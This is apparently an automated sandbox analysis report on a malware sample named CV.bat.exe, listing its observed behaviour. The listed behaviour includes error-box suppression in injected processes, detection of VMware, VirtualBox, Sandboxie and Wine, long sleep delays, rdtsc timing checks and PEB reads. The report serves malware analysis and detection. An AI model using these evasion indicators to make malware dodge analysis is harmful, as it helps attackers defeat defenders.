Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CV.bat.exe PID: 6056, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\user\Desktop\CV.bat.exe TID: 6044	Thread sleep time: -41226s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe TID: 6036	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4092	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\chkdsk.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\CV.bat.exe

Code function: 8_2_01286DE6 rdtsc

8_2_01286DE6

Source: C:\Users\user\Desktop\CV.bat.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9452

Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe

API coverage: 8.8 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe	Thread delayed: delay time: 41226	Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VBOXDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000D.00000000.401556844.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\6HARDWARE\Description\System"SystemBiosVersionTSOFTWARE\Oracle\VirtualBox Guest Additions
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: CV.bat.exe, 00000000.00000002.299464091.0000000000AE1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 0000000D.00000000.396822485.0000000007166000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 0000000D.00000000.401556844.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000D.00000000.368187868.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 0000000D.00000000.401556844.00000000090D8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 0000000D.00000000.360030003.0000000005063000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: CV.bat.exe, 00000000.00000002.302783902.0000000002836000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000D.00000000.368187868.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\Desktop\CV.bat.exe

Code function: 8_2_01286DE6 rdtsc

8_2_01286DE6

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01318D34 mov eax, dword ptr fs:[00000030h]	8_2_01318D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h]	8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h]	8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h]	8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120 mov eax, dword ptr fs:[00000030h]	8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120 mov ecx, dword ptr fs:[00000030h]	8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130E539 mov eax, dword ptr fs:[00000030h]	8_2_0130E539
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01253D34 mov eax, dword ptr fs:[00000030h]	8_2_01253D34
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124AD30 mov eax, dword ptr fs:[00000030h]	8_2_0124AD30
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012CA537 mov eax, dword ptr fs:[00000030h]	8_2_012CA537
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274D3B mov eax, dword ptr fs:[00000030h]	8_2_01274D3B
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274D3B mov eax, dword ptr fs:[00000030h]	8_2_01274D3B
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01274D3B mov eax, dword ptr fs:[00000030h]	8_2_01274D3B
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127513A mov eax, dword ptr fs:[00000030h]	8_2_0127513A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127513A mov eax, dword ptr fs:[00000030h]	8_2_0127513A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249100 mov eax, dword ptr fs:[00000030h]	8_2_01249100
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249100 mov eax, dword ptr fs:[00000030h]	8_2_01249100
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01249100 mov eax, dword ptr fs:[00000030h]	8_2_01249100
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124C962 mov eax, dword ptr fs:[00000030h]	8_2_0124C962
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126C577 mov eax, dword ptr fs:[00000030h]	8_2_0126C577
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126C577 mov eax, dword ptr fs:[00000030h]	8_2_0126C577
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124B171 mov eax, dword ptr fs:[00000030h]	8_2_0124B171
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124B171 mov eax, dword ptr fs:[00000030h]	8_2_0124B171
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126B944 mov eax, dword ptr fs:[00000030h]	8_2_0126B944
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126B944 mov eax, dword ptr fs:[00000030h]	8_2_0126B944
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01283D43 mov eax, dword ptr fs:[00000030h]	8_2_01283D43
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C3540 mov eax, dword ptr fs:[00000030h]	8_2_012C3540
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01267D50 mov eax, dword ptr fs:[00000030h]	8_2_01267D50
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012735A1 mov eax, dword ptr fs:[00000030h]	8_2_012735A1
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012761A0 mov eax, dword ptr fs:[00000030h]	8_2_012761A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012761A0 mov eax, dword ptr fs:[00000030h]	8_2_012761A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C69A6 mov eax, dword ptr fs:[00000030h]	8_2_012C69A6
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01271DB5 mov eax, dword ptr fs:[00000030h]	8_2_01271DB5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01271DB5 mov eax, dword ptr fs:[00000030h]	8_2_01271DB5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01271DB5 mov eax, dword ptr fs:[00000030h]	8_2_01271DB5
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h]	8_2_012C51BE
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h]	8_2_012C51BE
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h]	8_2_012C51BE
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C51BE mov eax, dword ptr fs:[00000030h]	8_2_012C51BE
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013105AC mov eax, dword ptr fs:[00000030h]	8_2_013105AC
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013105AC mov eax, dword ptr fs:[00000030h]	8_2_013105AC
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127A185 mov eax, dword ptr fs:[00000030h]	8_2_0127A185
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0126C182 mov eax, dword ptr fs:[00000030h]	8_2_0126C182
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h]	8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h]	8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h]	8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272581 mov eax, dword ptr fs:[00000030h]	8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h]	8_2_01242D8A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h]	8_2_01242D8A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h]	8_2_01242D8A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h]	8_2_01242D8A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01242D8A mov eax, dword ptr fs:[00000030h]	8_2_01242D8A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272990 mov eax, dword ptr fs:[00000030h]	8_2_01272990
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127FD9B mov eax, dword ptr fs:[00000030h]	8_2_0127FD9B
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127FD9B mov eax, dword ptr fs:[00000030h]	8_2_0127FD9B
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0124B1E1
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0124B1E1
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124B1E1 mov eax, dword ptr fs:[00000030h]	8_2_0124B1E1
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012D41E8 mov eax, dword ptr fs:[00000030h]	8_2_012D41E8
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125D5E0 mov eax, dword ptr fs:[00000030h]	8_2_0125D5E0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125D5E0 mov eax, dword ptr fs:[00000030h]	8_2_0125D5E0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	8_2_0130FDE2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	8_2_0130FDE2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	8_2_0130FDE2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130FDE2 mov eax, dword ptr fs:[00000030h]	8_2_0130FDE2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012F8DF1 mov eax, dword ptr fs:[00000030h]	8_2_012F8DF1
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov ecx, dword ptr fs:[00000030h]	8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6DC9 mov eax, dword ptr fs:[00000030h]	8_2_012C6DC9
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h]	8_2_0127002D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h]	8_2_0127002D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h]	8_2_0127002D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h]	8_2_0127002D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127002D mov eax, dword ptr fs:[00000030h]	8_2_0127002D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127BC2C mov eax, dword ptr fs:[00000030h]	8_2_0127BC2C
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h]	8_2_0125B02A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h]	8_2_0125B02A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h]	8_2_0125B02A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125B02A mov eax, dword ptr fs:[00000030h]	8_2_0125B02A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01314015 mov eax, dword ptr fs:[00000030h]	8_2_01314015
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01314015 mov eax, dword ptr fs:[00000030h]	8_2_01314015
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h]	8_2_012C6C0A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012C6C0A mov eax, dword ptr fs:[00000030h]	8_2_012C6C0A
